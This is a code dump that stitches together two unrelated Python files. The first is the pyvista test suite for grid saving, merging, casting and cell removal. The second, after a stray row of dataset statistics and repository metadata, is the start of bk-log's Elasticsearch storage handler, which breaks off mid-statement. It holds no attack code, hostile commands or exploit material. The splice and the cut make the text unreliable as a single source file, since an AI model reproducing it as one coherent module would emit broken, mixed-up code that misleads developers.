def test_triangulate_inplace(hexbeam):
    hexbeam.triangulate(inplace=True)
    assert (hexbeam.celltypes == vtk.VTK_TETRA).all()
# -- round-trip save/load for every writer extension, binary and ascii.
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', pyvista.pointset.UnstructuredGrid._WRITERS)
def test_save(extension, binary, tmpdir, hexbeam):
    filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
    hexbeam.save(filename, binary)
    grid = pyvista.UnstructuredGrid(filename)
    assert grid.cells.shape == hexbeam.cells.shape
    assert grid.points.shape == hexbeam.points.shape
    grid = pyvista.read(filename)
    assert grid.cells.shape == hexbeam.cells.shape
    assert grid.points.shape == hexbeam.points.shape
    assert isinstance(grid, pyvista.UnstructuredGrid)
# -- pathlib.Path is accepted everywhere a string path is.
def test_pathlib_read_write(tmpdir, hexbeam):
    path = pathlib.Path(str(tmpdir.mkdir("tmpdir").join('tmp.vtk')))
    assert not path.is_file()
    hexbeam.save(path)
    assert path.is_file()
    grid = pyvista.UnstructuredGrid(path)
    assert grid.cells.shape == hexbeam.cells.shape
    assert grid.points.shape == hexbeam.points.shape
    grid = pyvista.read(path)
    assert grid.cells.shape == hexbeam.cells.shape
    assert grid.points.shape == hexbeam.points.shape
    assert isinstance(grid, pyvista.UnstructuredGrid)
# -- wrong file type raises ValueError; missing file raises FileNotFoundError.
def test_init_bad_filename():
    filename = os.path.join(test_path, 'test_grid.py')
    with pytest.raises(ValueError):
        grid = pyvista.UnstructuredGrid(filename)
    with pytest.raises(FileNotFoundError):
        grid = pyvista.UnstructuredGrid('not a file')
# -- unknown extension on a nonexistent file surfaces as FileNotFoundError.
def test_save_bad_extension():
    with pytest.raises(FileNotFoundError):
        grid = pyvista.UnstructuredGrid('file.abc')
# -- linear_copy demotes quadratic cells (celltype ids >= 20) to linear ones.
def test_linear_copy(hexbeam):
    # need a grid with quadratic cells
    lgrid = hexbeam.linear_copy()
    assert np.all(lgrid.celltypes < 20)
# -- linear_copy on quadratic surface elements preserves mesh quality bounds.
def test_linear_copy_surf_elem():
    cells = np.array([8, 0, 1, 2, 3, 4, 5, 6, 7, 6, 8, 9, 10, 11, 12, 13], np.int32)
    celltypes = np.array([vtk.VTK_QUADRATIC_QUAD, vtk.VTK_QUADRATIC_TRIANGLE],
                         np.uint8)
    cell0 = [[0.0, 0.0, 0.0],
             [1.0, 0.0, 0.0],
             [1.0, 1.0, 0.0],
             [0.0, 1.0, 0.0],
             [0.5, 0.1, 0.0],
             [1.1, 0.5, 0.0],
             [0.5, 0.9, 0.0],
             [0.1, 0.5, 0.0]]
    cell1 = [[0.0, 0.0, 1.0],
             [1.0, 0.0, 1.0],
             [0.5, 0.5, 1.0],
             [0.5, 0.0, 1.3],
             [0.7, 0.7, 1.3],
             [0.1, 0.1, 1.3]]
    points = np.vstack((cell0, cell1))
    if VTK9:
        grid = pyvista.UnstructuredGrid(cells, celltypes, points, deep=False)
    else:
        offset = np.array([0, 9])
        grid = pyvista.UnstructuredGrid(offset, cells, celltypes, points, deep=False)
    lgrid = grid.linear_copy()
    qfilter = vtk.vtkMeshQuality()
    qfilter.SetInputData(lgrid)
    qfilter.Update()
    qual = pyvista.wrap(qfilter.GetOutput())['Quality']
    assert np.allclose(qual, [1, 1.4], atol=0.01)
# -- extract_cells accepts index lists, boolean masks and numpy index arrays.
def test_extract_cells(hexbeam):
    ind = [1, 2, 3]
    part_beam = hexbeam.extract_cells(ind)
    assert part_beam.n_cells == len(ind)
    assert part_beam.n_points < hexbeam.n_points
    assert np.allclose(part_beam.cell_arrays['vtkOriginalCellIds'], ind)
    mask = np.zeros(hexbeam.n_cells, np.bool_)
    mask[ind] = True
    part_beam = hexbeam.extract_cells(mask)
    assert part_beam.n_cells == len(ind)
    assert part_beam.n_points < hexbeam.n_points
    assert np.allclose(part_beam.cell_arrays['vtkOriginalCellIds'], ind)
    ind = np.vstack(([1, 2], [4, 5]))[:, 0]
    part_beam = hexbeam.extract_cells(ind)
# -- merging with merge_points=True deduplicates shared points.
def test_merge(hexbeam):
    grid = hexbeam.copy()
    grid.points[:, 0] += 1
    unmerged = grid.merge(hexbeam, inplace=False, merge_points=False)
    grid.merge(hexbeam, inplace=True, merge_points=True)
    assert grid.n_points > hexbeam.n_points
    assert grid.n_points < unmerged.n_points
# -- same as above with main_has_priority=False on the unmerged branch.
def test_merge_not_main(hexbeam):
    grid = hexbeam.copy()
    grid.points[:, 0] += 1
    unmerged = grid.merge(hexbeam, inplace=False, merge_points=False,
                          main_has_priority=False)
    grid.merge(hexbeam, inplace=True, merge_points=True)
    assert grid.n_points > hexbeam.n_points
    assert grid.n_points < unmerged.n_points
# -- merge accepts a list of grids.
def test_merge_list(hexbeam):
    grid_a = hexbeam.copy()
    grid_a.points[:, 0] += 1
    grid_b = hexbeam.copy()
    grid_b.points[:, 1] += 1
    grid_a.merge([hexbeam, grid_b], inplace=True, merge_points=True)
    assert grid_a.n_points > hexbeam.n_points
# -- merging a grid into a PolyData sphere is a TypeError.
def test_merge_invalid(hexbeam, sphere):
    with pytest.raises(TypeError):
        sphere.merge([hexbeam], inplace=True)
# -- StructuredGrid from meshgrid arrays matches the struct_grid fixture.
def test_init_structured(struct_grid):
    xrng = np.arange(-10, 10, 2)
    yrng = np.arange(-10, 10, 2)
    zrng = np.arange(-10, 10, 2)
    x, y, z = np.meshgrid(xrng, yrng, zrng)
    grid = pyvista.StructuredGrid(x, y, z)
    assert np.allclose(struct_grid.x, x)
    assert np.allclose(struct_grid.y, y)
    assert np.allclose(struct_grid.z, z)
    grid_a = pyvista.StructuredGrid(grid)
    assert np.allclose(grid_a.points, grid.points)
# -- mismatched coordinate array shapes raise ValueError.
def test_invalid_init_structured():
    xrng = np.arange(-10, 10, 2)
    yrng = np.arange(-10, 10, 2)
    zrng = np.arange(-10, 10, 2)
    x, y, z = np.meshgrid(xrng, yrng, zrng)
    z = z[:, :, :2]
    with pytest.raises(ValueError):
        grid = pyvista.StructuredGrid(x, y, z)
# -- round-trip save/load of a StructuredGrid for every writer extension.
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', pyvista.pointset.StructuredGrid._WRITERS)
def test_save_structured(extension, binary, tmpdir, struct_grid):
    filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
    struct_grid.save(filename, binary)
    grid = pyvista.StructuredGrid(filename)
    assert grid.x.shape == struct_grid.y.shape
    assert grid.n_cells
    assert grid.points.shape == struct_grid.points.shape
    grid = pyvista.read(filename)
    assert grid.x.shape == struct_grid.y.shape
    assert grid.n_cells
    assert grid.points.shape == struct_grid.points.shape
    assert isinstance(grid, pyvista.StructuredGrid)
# -- missing file vs wrong file type raise distinct exceptions.
def test_load_structured_bad_filename():
    with pytest.raises(FileNotFoundError):
        pyvista.StructuredGrid('not a file')
    filename = os.path.join(test_path, 'test_grid.py')
    with pytest.raises(ValueError):
        grid = pyvista.StructuredGrid(filename)
# -- RectilinearGrid built from 1-3 coordinate arrays; counts and bounds.
def test_create_rectilinear_grid_from_specs():
    # 3D example
    xrng = np.arange(-10, 10, 2)
    yrng = np.arange(-10, 10, 5)
    zrng = np.arange(-10, 10, 1)
    grid = pyvista.RectilinearGrid(xrng)
    assert grid.n_cells == 9
    assert grid.n_points == 10
    grid = pyvista.RectilinearGrid(xrng, yrng)
    assert grid.n_cells == 9*3
    assert grid.n_points == 10*4
    grid = pyvista.RectilinearGrid(xrng, yrng, zrng)
    assert grid.n_cells == 9*3*19
    assert grid.n_points == 10*4*20
    assert grid.bounds == [-10.0,8.0, -10.0,5.0, -10.0,9.0]
    # 2D example
    cell_spacings = np.array([1., 1., 2., 2., 5., 10.])
    x_coordinates = np.cumsum(cell_spacings)
    y_coordinates = np.cumsum(cell_spacings)
    grid = pyvista.RectilinearGrid(x_coordinates, y_coordinates)
    assert grid.n_cells == 5*5
    assert grid.n_points == 6*6
    assert grid.bounds == [1.,21., 1.,21., 0.,0.]
# -- coordinate arrays may be assigned axis-by-axis after construction.
def test_create_rectilinear_after_init():
    x = np.array([0,1,2])
    y = np.array([0,5,8])
    z = np.array([3,2,1])
    grid = pyvista.RectilinearGrid()
    grid.x = x
    assert grid.dimensions == [3, 1, 1]
    grid.y = y
    assert grid.dimensions == [3, 3, 1]
    grid.z = z
    assert grid.dimensions == [3, 3, 3]
    assert np.allclose(grid.x, x)
    assert np.allclose(grid.y, y)
    assert np.allclose(grid.z, z)
# -- bundled example rectilinear file loads with known sizes/bounds.
def test_create_rectilinear_grid_from_file():
    grid = examples.load_rectilinear()
    assert grid.n_cells == 16146
    assert grid.n_points == 18144
    assert grid.bounds == [-350.0,1350.0, -400.0,1350.0, -850.0,0.0]
    assert grid.n_arrays == 1
# -- same via the generic pyvista.read entry point.
def test_read_rectilinear_grid_from_file():
    grid = pyvista.read(examples.rectfile)
    assert grid.n_cells == 16146
    assert grid.n_points == 18144
    assert grid.bounds == [-350.0,1350.0, -400.0,1350.0, -850.0,0.0]
    assert grid.n_arrays == 1
# -- same via a pathlib.Path argument.
def test_read_rectilinear_grid_from_pathlib():
    grid = pyvista.RectilinearGrid(pathlib.Path(examples.rectfile))
    assert grid.n_cells == 16146
    assert grid.n_points == 18144
    assert grid.bounds == [-350.0, 1350.0, -400.0, 1350.0, -850.0, 0.0]
    assert grid.n_arrays == 1
# -- casting rectilinear -> structured preserves points and data arrays.
def test_cast_rectilinear_grid():
    grid = pyvista.read(examples.rectfile)
    structured = grid.cast_to_structured_grid()
    assert isinstance(structured, pyvista.StructuredGrid)
    assert structured.n_points == grid.n_points
    assert structured.n_cells == grid.n_cells
    assert np.allclose(structured.points, grid.points)
    for k, v in grid.point_arrays.items():
        assert np.allclose(structured.point_arrays[k], v)
    for k, v in grid.cell_arrays.items():
        assert np.allclose(structured.cell_arrays[k], v)
# -- UniformGrid constructed from dims / spacing / origin combinations.
def test_create_uniform_grid_from_specs():
    # create UniformGrid
    dims = [10, 10, 10]
    grid = pyvista.UniformGrid(dims) # Using default spacing and origin
    assert grid.dimensions == [10, 10, 10]
    assert grid.extent == [0, 9, 0, 9, 0, 9]
    assert grid.origin == [0.0, 0.0, 0.0]
    assert grid.spacing == [1.0, 1.0, 1.0]
    spacing = [2, 1, 5]
    grid = pyvista.UniformGrid(dims, spacing) # Using default origin
    assert grid.dimensions == [10, 10, 10]
    assert grid.origin == [0.0, 0.0, 0.0]
    assert grid.spacing == [2.0, 1.0, 5.0]
    origin = [10, 35, 50]
    grid = pyvista.UniformGrid(dims, spacing, origin) # Everything is specified
    assert grid.dimensions == [10, 10, 10]
    assert grid.origin == [10.0, 35.0, 50.0]
    assert grid.spacing == [2.0, 1.0, 5.0]
    assert grid.dimensions == [10, 10, 10]
# -- property setters round-trip to the underlying VTK getters.
def test_uniform_setters():
    grid = pyvista.UniformGrid()
    grid.dimensions = [10, 10, 10]
    assert grid.GetDimensions() == (10, 10, 10)
    assert grid.dimensions == [10, 10, 10]
    grid.spacing = [5, 2, 1]
    assert grid.GetSpacing() == (5, 2, 1)
    assert grid.spacing == [5, 2, 1]
    grid.origin = [6, 27.7, 19.8]
    assert grid.GetOrigin() == (6, 27.7, 19.8)
    assert grid.origin == [6, 27.7, 19.8]
# -- bundled example uniform grid loads with known sizes/bounds.
def test_create_uniform_grid_from_file():
    grid = examples.load_uniform()
    assert grid.n_cells == 729
    assert grid.n_points == 1000
    assert grid.bounds == [0.0,9.0, 0.0,9.0, 0.0,9.0]
    assert grid.n_arrays == 2
    assert grid.dimensions == [10, 10, 10]
# -- same via the generic pyvista.read entry point.
def test_read_uniform_grid_from_file():
    grid = pyvista.read(examples.uniformfile)
    assert grid.n_cells == 729
    assert grid.n_points == 1000
    assert grid.bounds == [0.0,9.0, 0.0,9.0, 0.0,9.0]
    assert grid.n_arrays == 2
    assert grid.dimensions == [10, 10, 10]
# -- same via a pathlib.Path argument.
def test_read_uniform_grid_from_pathlib():
    grid = pyvista.UniformGrid(pathlib.Path(examples.uniformfile))
    assert grid.n_cells == 729
    assert grid.n_points == 1000
    assert grid.bounds == [0.0, 9.0, 0.0, 9.0, 0.0, 9.0]
    assert grid.n_arrays == 2
    assert grid.dimensions == [10, 10, 10]
# -- casting uniform -> structured preserves counts, arrays and bounds.
def test_cast_uniform_to_structured():
    grid = examples.load_uniform()
    structured = grid.cast_to_structured_grid()
    assert structured.n_points == grid.n_points
    assert structured.n_arrays == grid.n_arrays
    assert structured.bounds == grid.bounds
# -- casting uniform -> rectilinear preserves counts, arrays and bounds.
def test_cast_uniform_to_rectilinear():
    grid = examples.load_uniform()
    rectilinear = grid.cast_to_rectilinear_grid()
    assert rectilinear.n_points == grid.n_points
    assert rectilinear.n_arrays == grid.n_arrays
    assert rectilinear.bounds == grid.bounds
# -- round-trip save/load of a RectilinearGrid for every reader extension.
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', pyvista.core.grid.RectilinearGrid._READERS)
def test_save_rectilinear(extension, binary, tmpdir):
    filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
    ogrid = examples.load_rectilinear()
    ogrid.save(filename, binary)
    grid = pyvista.RectilinearGrid(filename)
    assert grid.n_cells == ogrid.n_cells
    assert np.allclose(grid.x, ogrid.x)
    assert np.allclose(grid.y, ogrid.y)
    assert np.allclose(grid.z, ogrid.z)
    assert grid.dimensions == ogrid.dimensions
    grid = pyvista.read(filename)
    assert isinstance(grid, pyvista.RectilinearGrid)
    assert grid.n_cells == ogrid.n_cells
    assert np.allclose(grid.x, ogrid.x)
    assert np.allclose(grid.y, ogrid.y)
    assert np.allclose(grid.z, ogrid.z)
    assert grid.dimensions == ogrid.dimensions
# -- round-trip save/load of a UniformGrid for every reader extension.
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', pyvista.core.grid.UniformGrid._READERS)
def test_save_uniform(extension, binary, tmpdir):
    filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
    ogrid = examples.load_uniform()
    ogrid.save(filename, binary)
    grid = pyvista.UniformGrid(filename)
    assert grid.n_cells == ogrid.n_cells
    assert grid.origin == ogrid.origin
    assert grid.spacing == ogrid.spacing
    assert grid.dimensions == ogrid.dimensions
    grid = pyvista.read(filename)
    assert isinstance(grid, pyvista.UniformGrid)
    assert grid.n_cells == ogrid.n_cells
    assert grid.origin == ogrid.origin
    assert grid.spacing == ogrid.spacing
    assert grid.dimensions == ogrid.dimensions
# -- points are derived (read-only) on UniformGrid and RectilinearGrid.
def test_grid_points():
    """Test the points methods on UniformGrid and RectilinearGrid"""
    # test creation of 2d grids
    x = y = range(3)
    z = [0,]
    xx, yy, zz = np.meshgrid(x, y, z, indexing='ij')
    points = np.c_[xx.ravel(order='F'), yy.ravel(order='F'), zz.ravel(order='F')]
    grid = pyvista.UniformGrid()
    with pytest.raises(AttributeError):
        grid.points = points
    grid.origin = (0.0, 0.0, 0.0)
    grid.dimensions = (3, 3, 1)
    grid.spacing = (1, 1, 1)
    assert grid.n_points == 9
    assert grid.n_cells == 4
    assert np.allclose(grid.points, points)
    points = np.array([[0, 0, 0],
                       [1, 0, 0],
                       [1, 1, 0],
                       [0, 1, 0],
                       [0, 0, 1],
                       [1, 0, 1],
                       [1, 1, 1],
                       [0, 1, 1]])
    grid = pyvista.UniformGrid()
    grid.dimensions = [2, 2, 2]
    grid.spacing = [1, 1, 1]
    grid.origin = [0., 0., 0.]
    assert np.allclose(np.unique(grid.points, axis=0), np.unique(points, axis=0))
    opts = np.c_[grid.x, grid.y, grid.z]
    assert np.allclose(np.unique(opts, axis=0), np.unique(points, axis=0))
    # Now test rectilinear grid
    grid = pyvista.RectilinearGrid()
    with pytest.raises(AttributeError):
        grid.points = points
    x, y, z = np.array([0, 1, 3]), np.array([0, 2.5, 5]), np.array([0, 1])
    xx, yy, zz = np.meshgrid(x, y, z, indexing='ij')
    grid.x = x
    grid.y = y
    grid.z = z
    assert grid.dimensions == [3, 3, 2]
    assert np.allclose(grid.meshgrid, (xx, yy, zz))
    assert np.allclose(grid.points, np.c_[xx.ravel(order='F'), yy.ravel(order='F'), zz.ravel(order='F')])
# -- extract_points accepts single indices and ranges.
def test_grid_extract_selection_points(struct_grid):
    grid = pyvista.UnstructuredGrid(struct_grid)
    sub_grid = grid.extract_points([0])
    assert sub_grid.n_cells == 1
    sub_grid = grid.extract_points(range(100))
    assert sub_grid.n_cells > 1
# -- smoothing keeps name/shape of the active scalars but changes values.
#    NOTE(review): the hexbeam fixture parameter is unused here.
def test_gaussian_smooth(hexbeam):
    uniform = examples.load_uniform()
    active = uniform.active_scalars_name
    values = uniform.active_scalars
    uniform = uniform.gaussian_smooth(scalars=active)
    assert uniform.active_scalars_name == active
    assert uniform.active_scalars.shape == values.shape
    assert not np.all(uniform.active_scalars == values)
    values = uniform.active_scalars
    uniform = uniform.gaussian_smooth(radius_factor=5, std_dev=1.3)
    assert uniform.active_scalars_name == active
    assert uniform.active_scalars.shape == values.shape
    assert not np.all(uniform.active_scalars == values)
# -- remove_cells accepts ranges, index arrays and full-size boolean masks.
@pytest.mark.parametrize('ind', [range(10), np.arange(10),
                                 HEXBEAM_CELLS_BOOL])
def test_remove_cells(ind, hexbeam):
    grid_copy = hexbeam.copy()
    grid_copy.remove_cells(ind)
    assert grid_copy.n_cells < hexbeam.n_cells
# -- inplace=False leaves the source grid untouched.
@pytest.mark.parametrize('ind', [range(10), np.arange(10),
                                 HEXBEAM_CELLS_BOOL])
def test_remove_cells_not_inplace(ind, hexbeam):
    grid_copy = hexbeam.copy() # copy to protect
    grid_w_removed = grid_copy.remove_cells(ind, inplace=False)
    assert grid_w_removed.n_cells < hexbeam.n_cells
    assert grid_copy.n_cells == hexbeam.n_cells
# -- a boolean mask whose length differs from n_cells is rejected.
def test_remove_cells_invalid(hexbeam):
    grid_copy = hexbeam.copy()
    with pytest.raises(ValueError):
        grid_copy.remove_cells(np.ones(10, np.bool_))
# -- hide_cells blanks cells on a StructuredGrid.
@pytest.mark.parametrize('ind', [range(10), np.arange(10),
                                 STRUCTGRID_CELLS_BOOL])
def test_hide_cells(ind, struct_grid):
    sgrid_copy = struct_grid.copy()
    sgrid_copy.hide_cells(ind)
    assert sgrid_copy.HasAnyBlankCells()
| 33.249597 | 105 | 0.649651 |
5eb3521837976c52bee8c1b7b77beb247e2debbc | 29,648 | py | Python | apps/log_databus/handlers/storage.py | ptaoapeng/bk-log | f54735a21ecea4e90c5ac2f5dbc0be13d0b9ab80 | [
"MIT"
] | 75 | 2021-07-14T09:32:36.000Z | 2022-03-31T15:26:53.000Z | apps/log_databus/handlers/storage.py | ptaoapeng/bk-log | f54735a21ecea4e90c5ac2f5dbc0be13d0b9ab80 | [
"MIT"
] | 561 | 2021-07-14T07:45:47.000Z | 2022-03-31T11:41:28.000Z | apps/log_databus/handlers/storage.py | ptaoapeng/bk-log | f54735a21ecea4e90c5ac2f5dbc0be13d0b9ab80 | [
"MIT"
] | 41 | 2021-07-14T07:39:50.000Z | 2022-03-25T09:22:18.000Z | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import functools
import re
import socket
from collections import defaultdict
from typing import Union, List
import arrow
from django.conf import settings
from django.utils.translation import ugettext as _
from django.db.models import Sum
from elasticsearch import Elasticsearch
from apps.log_databus.utils.es_config import get_es_config
from apps.utils.log import logger
from apps.utils.thread import MultiExecuteFunc
from apps.constants import UserOperationTypeEnum, UserOperationActionEnum
from apps.iam import Permission, ResourceEnum
from apps.log_esquery.utils.es_route import EsRoute
from apps.log_search.models import Scenario, ProjectInfo
from apps.utils.cache import cache_five_minute
from apps.utils.local import get_local_param, get_request_username
from apps.api import TransferApi, BkLogApi
from apps.log_databus.models import StorageCapacity, StorageUsed, DataLinkConfig
from apps.log_databus.constants import (
STORAGE_CLUSTER_TYPE,
REGISTERED_SYSTEM_DEFAULT,
DEFAULT_ES_SCHEMA,
NODE_ATTR_PREFIX_BLACKLIST,
BKLOG_RESULT_TABLE_PATTERN,
EsSourceType,
)
from apps.log_databus.exceptions import (
StorageNotExistException,
StorageNotPermissionException,
StorageConnectInfoException,
StorageUnKnowEsVersionException,
StorageHaveResource,
)
from apps.decorators import user_operation_record
from apps.utils.time_handler import format_user_time_zone
CACHE_EXPIRE_TIME = 300
class StorageHandler(object):
    def __init__(self, cluster_id=None):
        # Optional ES storage cluster id this handler operates on; None means
        # the handler is only used for cluster-listing style operations.
        self.cluster_id = cluster_id
        super().__init__()
def get_cluster_groups(self, bk_biz_id, is_default=True):
"""
获取集群列表
:param bk_biz_id:
:param is_default:
:return:
"""
cluster_groups = self.filter_cluster_groups(
TransferApi.get_cluster_info({"cluster_type": STORAGE_CLUSTER_TYPE}), bk_biz_id, is_default=is_default
)
return [
{
"storage_cluster_id": i["cluster_config"].get("cluster_id"),
"storage_cluster_name": i["cluster_config"].get("cluster_name"),
"storage_version": i["cluster_config"].get("version"),
"storage_type": STORAGE_CLUSTER_TYPE,
"priority": i["priority"],
"registered_system": i["cluster_config"].get("registered_system"),
"bk_biz_id": i["bk_biz_id"],
"enable_hot_warm": i["cluster_config"]["custom_option"]
.get("hot_warm_config", {})
.get("is_enabled", False),
}
for i in cluster_groups
if i
]
    def get_cluster_groups_filter(self, bk_biz_id, is_default=True, data_link_id=0):
        """
        Fetch the visible cluster list, filter it by data link, sort it, and
        annotate shared clusters with their capacity quota / usage.
        :param bk_biz_id: business id
        :param is_default: include shared/default clusters when True
        :param data_link_id: data link ID (0 = no link filtering)
        :return: sorted, annotated cluster summaries
        """
        cluster_groups = self.get_cluster_groups(bk_biz_id, is_default=is_default)
        if data_link_id:
            # When a data link id is given, keep only the clusters bound to that link
            link_object = DataLinkConfig.objects.filter(data_link_id=data_link_id).first()
            if link_object:
                es_list = link_object.es_cluster_ids
            else:
                es_list = []
            # Non-shared (third-party) clusters bypass the link filter
            cluster_groups = [
                c
                for c in cluster_groups
                if c["storage_cluster_id"] in es_list or c.get("registered_system") != REGISTERED_SYSTEM_DEFAULT
            ]
        # Sort order: third-party clusters (priority 0) before default/shared ones
        cluster_groups.sort(key=lambda c: c["priority"])
        # Collect the shared clusters so their usage can be looked up in one query
        public_clusters = [
            cluster["storage_cluster_id"]
            for cluster in cluster_groups
            if cluster.get("registered_system") == REGISTERED_SYSTEM_DEFAULT
        ]
        if not public_clusters:
            return cluster_groups
        es_config = get_es_config(bk_biz_id)
        # Capacity quota / current usage of the shared clusters for this business
        storage_capacity = self.get_storage_capacity(bk_biz_id, public_clusters)
        for cluster in cluster_groups:
            if cluster.get("registered_system") == REGISTERED_SYSTEM_DEFAULT:
                cluster["storage_capacity"] = storage_capacity["storage_capacity"]
                cluster["storage_used"] = storage_capacity["storage_used"]
                cluster["max_retention"] = es_config["ES_PUBLIC_STORAGE_DURATION"]
            else:
                # Private clusters have no shared quota accounting
                cluster["storage_capacity"] = 0
                cluster["storage_used"] = 0
                cluster["max_retention"] = es_config["ES_PRIVATE_STORAGE_DURATION"]
        return cluster_groups
    @classmethod
    def filter_cluster_groups(cls, cluster_groups, bk_biz_id, is_default=True):
        """
        Filter raw cluster records for a business and mark each as editable or not.

        Shared (default) clusters get credentials/domain blanked and are not
        editable; private clusters are visibility-filtered by bk_biz_id.
        :param cluster_groups: raw records from TransferApi.get_cluster_info
        :param bk_biz_id: business id performing the query
        :param is_default: include shared/default clusters when True
        :return: filtered records annotated with priority / editability / source info
        """
        cluster_data = list()
        projects = ProjectInfo.get_cmdb_projects()
        # Filter clusters & decide editability per record
        for cluster_obj in cluster_groups:
            cluster_obj["cluster_config"]["create_time"] = StorageHandler.convert_standard_time(
                cluster_obj["cluster_config"]["create_time"]
            )
            cluster_obj["cluster_config"]["last_modify_time"] = StorageHandler.convert_standard_time(
                cluster_obj["cluster_config"]["last_modify_time"]
            )
            cluster_obj["cluster_config"]["schema"] = cluster_obj["cluster_config"].get("schema") or DEFAULT_ES_SCHEMA
            enable_hot_warm = (
                cluster_obj["cluster_config"]["custom_option"].get("hot_warm_config", {}).get("is_enabled", False)
            )
            cluster_obj["cluster_config"]["enable_hot_warm"] = enable_hot_warm
            es_config = get_es_config(bk_biz_id)
            # Shared cluster: blank credentials and domain, mark as not editable
            if cluster_obj["cluster_config"].get("registered_system") == REGISTERED_SYSTEM_DEFAULT:
                if not is_default:
                    continue
                cluster_obj.update({"auth_info": {"username": "", "password": ""}, "is_editable": False})
                cluster_obj["cluster_config"]["domain_name"] = ""
                cluster_obj["cluster_config"]["max_retention"] = es_config["ES_PUBLIC_STORAGE_DURATION"]
                # Default-cluster weight: recommended cluster (1) before the others (2)
                cluster_obj["priority"] = 1 if cluster_obj["cluster_config"].get("is_default_cluster") else 2
                cluster_obj["bk_biz_id"] = 0
                cluster_data.append(cluster_obj)
                continue
            # Private cluster: filter by bk_biz_id, blank the password, mark editable
            custom_option = cluster_obj["cluster_config"]["custom_option"]
            custom_biz_id = custom_option.get("bk_biz_id")
            custom_visible_bk_biz = custom_option.get("visible_bk_biz", [])
            cluster_obj["cluster_config"]["max_retention"] = es_config["ES_PRIVATE_STORAGE_DURATION"]
            if not cls.storage_visible(bk_biz_id, custom_biz_id, custom_visible_bk_biz):
                continue
            cluster_obj["is_editable"] = True
            cluster_obj["auth_info"]["password"] = ""
            # Third-party ES clusters sort first (highest weight)
            cluster_obj["priority"] = 0
            cluster_obj["bk_biz_id"] = custom_biz_id
            # Local import — presumably to avoid a circular import; TODO confirm
            from apps.log_search.handlers.index_set import IndexSetHandler
            index_sets = IndexSetHandler.get_index_set_for_storage(cluster_obj["cluster_config"]["cluster_id"])
            # NOTE(review): the comprehension variable shadows the outer bk_biz_id parameter
            cluster_obj["visible_bk_biz"] = [
                {
                    "bk_biz_id": bk_biz_id,
                    "is_use": index_sets.filter(project_id=projects.get(bk_biz_id), is_active=True).exists(),
                }
                for bk_biz_id in custom_visible_bk_biz
            ]
            # Resolve the display name of the cluster source
            cluster_obj["source_type"] = custom_option.get("source_type", EsSourceType.PRIVATE.value)
            cluster_obj["source_name"] = (
                custom_option.get("source_name")
                if cluster_obj["source_type"] == EsSourceType.OTHER.value
                else EsSourceType.get_choice_label(cluster_obj["source_type"])
            )
            cluster_data.append(cluster_obj)
        return cluster_data
@staticmethod
def storage_visible(bk_biz_id, custom_bk_biz_id, visible_bk_biz: List[int]) -> bool:
bk_biz_id = int(bk_biz_id)
if bk_biz_id in visible_bk_biz:
return True
if not custom_bk_biz_id:
return False
custom_bk_biz_id = int(custom_bk_biz_id)
return custom_bk_biz_id == bk_biz_id
@staticmethod
def convert_standard_time(time_stamp):
try:
time_zone = get_local_param("time_zone")
return arrow.get(int(time_stamp)).to(time_zone).strftime("%Y-%m-%d %H:%M:%S%z")
except Exception: # pylint: disable=broad-except
return time_stamp
    def list(self, bk_biz_id, cluster_id=None, is_default=True):
        """
        List storage clusters visible to a business.
        When a single cluster_id is given, the record is additionally enriched
        with node stats and cluster detail info (expensive, so single-id only).
        :return: filtered cluster records
        """
        params = {"cluster_type": STORAGE_CLUSTER_TYPE}
        if cluster_id:
            params["cluster_id"] = cluster_id
        cluster_info = TransferApi.get_cluster_info(params)
        if cluster_id:
            cluster_info = self._get_cluster_nodes(cluster_info)
            cluster_info = self._get_cluster_detail_info(cluster_info)
        return self.filter_cluster_groups(cluster_info, bk_biz_id, is_default)
    def _get_cluster_nodes(self, cluster_info: List[dict]):
        """Attach a ``nodes`` summary (tag, roles, memory, disk totals) to each cluster record."""
        for cluster in cluster_info:
            cluster_id = cluster.get("cluster_config").get("cluster_id")
            # raise_exception=False: an unreachable cluster yields an empty payload
            nodes_stats = EsRoute(
                scenario_id=Scenario.ES, storage_cluster_id=cluster_id, raise_exception=False
            ).cluster_nodes_stats()
            if not nodes_stats:
                cluster["nodes"] = []
                continue
            cluster["nodes"] = [
                {
                    "tag": node.get("attributes", {}).get("tag", ""),
                    "attributes": node.get("attributes"),
                    "name": node["name"],
                    "ip": node["ip"],
                    "host": node["host"],
                    "roles": node["roles"],
                    "mem_total": node["os"]["mem"]["total_in_bytes"],
                    "store_total": node["fs"]["total"]["total_in_bytes"],
                }
                for node in nodes_stats["nodes"].values()
            ]
        return cluster_info
    def _get_cluster_detail_info(self, cluster_info: List[dict]):
        """Fetch cluster stats for every record concurrently and attach them as ``cluster_stats``."""
        multi_execute_func = MultiExecuteFunc()
        def get_cluster_stats(cluster_id: int):
            # raise_exception=False: a down cluster produces None instead of an error
            return EsRoute(
